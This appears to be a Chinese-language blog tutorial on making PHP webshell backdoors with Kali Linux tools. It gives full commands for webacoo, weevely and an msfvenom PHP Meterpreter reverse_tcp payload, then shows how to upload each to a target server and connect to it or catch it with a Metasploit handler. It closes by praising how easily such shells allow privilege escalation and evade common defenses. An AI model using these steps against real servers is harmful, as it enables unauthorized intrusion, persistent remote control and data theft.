kali下生成web端後門

  很多時候在***測試時選擇web***害怕用的別人的馬帶有後門,這樣自己的辛苦就要被別人不勞而獲,很多時候我們都想擁有自己的馬,那麼這個時候你就應該使用kail來生成一個自己獨特密碼的web***了。

 Kali Linux自帶有好幾個web***生成工具,下面我們來簡單看幾個:


1.webacoo後門

webacoo  -g -o test.php

-g 製作後門代碼

-o 輸出生成指定的後門程序文件名

wKioL1Zli82gQMVfAAAu6riv1A0061.png

把web後門上傳到目標服務器後

使用kali linux訪問如下

webacoo -t -u http://www.xx.com/test.php

注意:上傳的路徑一定要正確

最後退出的時候使用exit退出



2.weevely

查看幫助信息

wKioL1Zli8-BvBjMAAAk1biLZUM186.png


生成後門

下列命令可以生產混攪PHP backdoor , 密碼password 後門名字disaplay.php


weevely generate password disaplay.php


wKioL1Zli9CTIbX0AAAzLMyt8MA048.png


把後門文件上傳到服務器後,如下命令可以成功訪問

weevely http://www.xxx.com/disaplay.php password

通過help看到weevely有很多的module

.net.ifaces 查看服務器的端口信息

.net.scan 202.205.xx.xx 22   對服務器某個端口掃描



3.PHP Meterpreter

metasploit有一個名爲PHP Meterpreter的payload,可創建具有meterpreter功能的PHP webshell。

Metasploit的msfvenom工具可以製作PHP Meterpreter,命令如下:

msfvenom  -p  php/meterpreter/reverse_tcp LHOST=自己監聽的IP -f raw > php_meter.php

-p 設置payload

-f 設置輸出文件格式

wKioL1Zli8-QE6pRAAAcwP6E-4M289.png


wKiom1Zli2DRN9KlAAAl3u1nWKs170.png


但是使用前需要注意生成文件的第一行被註釋了,所以需要把註釋去掉才能使用

把webshell上傳到目標服務器,本地監聽打開如下:

啓動msfconsole

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set LHOST 202.205.7.162


wKiom1Zli1_xIK6FAAAtU0mx_E0849.png


然後我們就可以使用kali的metasploit功能對目標服務器進行一系列操作。



這種WEBSHELL 利用起來相當方便,輸入shell命令之後,就可以隨便提權什麼的了.
1,國內的貌似沒有防護這塊的,國內大多隻防護GET POST COOKIE這些數據.
2,缺點是如果服務器在DMZ,則失效.
3,more what .....   這種shell如果被利用多了,肯定會有硬件廠商去做防護的.

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章